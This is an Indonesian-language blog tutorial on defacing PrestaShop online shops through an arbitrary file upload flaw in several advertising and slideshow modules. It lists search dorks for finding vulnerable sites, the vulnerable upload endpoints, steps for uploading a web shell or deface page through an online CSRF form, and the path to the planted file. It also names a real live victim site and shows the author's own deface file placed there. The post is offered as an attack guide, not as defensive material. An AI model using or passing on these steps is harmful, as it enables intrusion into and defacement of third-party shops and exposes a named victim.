Cara Deface Prestashop Arbitrary File Upload


Prestashop Arbitrary File Upload - Pada artikel kali ini, saya akan memberikan tutorial deface untuk website yang menggunakan cms prestashop. Teknik ini sering disebut dengan Prestashop Arbitrary File Upload. Pasti untuk kalian sudah tidak asing lagi, jadi untuk para mastah kami minta sarannya ya, kalau saya ada salah silahkan kasih saran ataupun kritikan dengan berkomentar dibawah.

Apa itu Prestashop?


Prestahop Arbitrary file upload - Seperti Shopify dan Magento, PrestaShop adalah perangkat lunak yang menyediakan layanan pembuatan web e-commerce berbasis bahasa program PHP, dan dataase MySQL, yang ekstensif melalui pemanfaatan modules..

Prestashop sering digunakan untuk membuat website yang mempromosikan produk mereka (toko online). Bagaimana cara melakukan Prestashop Abitary File Upload?

Bahan:


Dork :

   Inurl:"/modules/columnadverts/"

   Inurl:"/modules/homepageadvertise/"

   Inurl:"/modules/productpageadverts/"

   Inurl:"/modules/simpleslideshow/"

   Inurl:"/modules/vtemslideshow/"

   Index Of "/modules/columnadverts/"

   Index Of "/modules/homepageadvertise/"

   Index Of "/modules/productpageadverts/"

   Index Of "/modules/simpleslideshow/"

   Index Of "/modules/vtemslideshow/"


Exploit: 


 http://loclahost/ modules/columnadverts/uploadimage.php

 http://localhost/ modules/homepageadvertise/uploadimage.php

 http://localhost/ modules/productpageadverts/uploadimage.php

 http://localhost/ modules/simpleslideshow/uploadimage.php

 http://localhost/ modules/vtemslideshow/uploadimage.php

Csrf online, silahkan kalian cari csrf online, banyak di google.

Live target:

http://plantasygambas.com/modules/columnadverts/uploadimage.php

Tutorial:


Dorking->> kasih exploitnya->>
Contoh : http://plantasygambas.com/modules/columnadverts/uploadimage.php

Itu ada tulisan error berarti webnya vuln

Pergi ke csrf ->>

1.masukin website yang vuln Prestashop Abitary File Upload tadi.

2.kolom bawah isi dgn userfile.

3.trus upload file kalian, baik itu shell shel hanya script deface.

Bagaimana cara mengakses file saya?

http://site.com/modules/columnadverts/uploadimage.php

Kalian ganti menjadi

http://site.com/modules/columnadverts/slides/yourfile.php

Punya me :
http://plantasygambas.com/modules/columnadverts/slides/an.html

Mungkin sekian yang bisa saya sampaikan tentang Prestashop Arbitrary File Upload. Jangan lupa memberi saran ataupun kritikan dengan berkomentar dibawah.
Terimakasih, wassalamu'alaikum wr.wb

LihatTutupKomentar